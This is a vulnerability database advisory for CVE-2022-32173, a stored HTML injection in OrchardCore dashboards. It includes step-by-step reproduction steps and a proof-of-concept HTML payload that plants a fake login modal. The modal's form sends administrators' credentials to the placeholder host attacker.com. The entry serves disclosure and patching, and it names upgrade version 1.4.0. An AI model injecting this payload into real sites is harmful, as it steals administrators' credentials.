Mend.io Vulnerability Database

What is a CVE vulnerability ID? icon What is a WS vulnerability ID? icon What is an MSC vulnerability ID? icon
New vulnerability? Tell us about it!
icon

We found results for “

CVE-2022-32173

Date: October 3, 2022

Overview

In OrchardCore rc1-11259 to v1.2.2 vulnerable to HTML injection, allow an authenticated user with an editor security role to inject a persistent HTML modal dialog component into the dashboard that will affect admin users.

Details

Once an admin access the dashboard, the injected modal dialog will be presented (preventing access to any other element on the page) and wait for an input, once submitted - the admin will be redirected to a malicious host and the attacker will receive the confidential data (user’s credentials for instance)

PoC Details

1. Log in as an admin, navigate to security roles, and then edit the “Editor” role.
2. Then, enable the “Manage the Admin Dashboard” privilege.
3. Create a user with an “Editor” role and logout.
4. Login with the new user.
5. Once logged in, navigate to the Admin’s page (“/Admin” route).
6. Press on “Manage Dashboard” and edit a certain Widget (with an HTML editing capabilities).
7. Press on “<>” and add the following HTML code (There is a code section)
8. Click on “Publish”.
Yow will see that you are brought into the “/Admin” page, and cannot press on any other element. Type in non-confidential data, and press on “Login”. You will see that you are redirected into the attacker site. Also the credentials are sent to him.
9. Now, let’s login as an admin (since you can’t logout, route to “/login”).
10. Navigate to the Admin’s page (“/Admin” route). You will see the Modal dialog appear.

PoC Code

<div class="modal show d-block">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<h3 class="page-title">Please Log In</h3>
</div>
<div class="modal-body">
<form class="new-wiki-page" action="http://attacker.com/">
<div class="form-group">
<label for="username"><span>Username</span></label>
<input type="text" name="username" id="username" class="form-control">
<label for="password"><span>Password</span></label>
<input type="password" name="password" id="password" class="form-control">
</div>
<div class="form-actions"><button name="button" type="submit" class="btn btn-success">Login</button></div>
</form>
</div>
</div>
</div>
</div>

Affected Environments

OrchardCore versions rc1-11259 through v1.2.2

Prevention

Upgrade to OrchardCore version v1.4.0

Language: C#

Good to know:

icon

Cross-Site Scripting (XSS)

CWE-79
icon

Upgrade Version

Upgrade to version OrchardCore.Infrastructure - 1.4.0

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None

Related Resources (6)

https://github.com/OrchardCMS/OrchardCore/commit/0163c88ddeaca39815d7e6e5ea1c8391085cc136
https://nvd.nist.gov/vuln/detail/CVE-2022-32173
https://www.mend.io/vulnerability-database/CVE-2022-32173
https://github.com/OrchardCMS/OrchardCore
https://github.com/OrchardCMS/OrchardCore/pull/11729
https://www.mend.io/vulnerability-database/CVE-2022-32173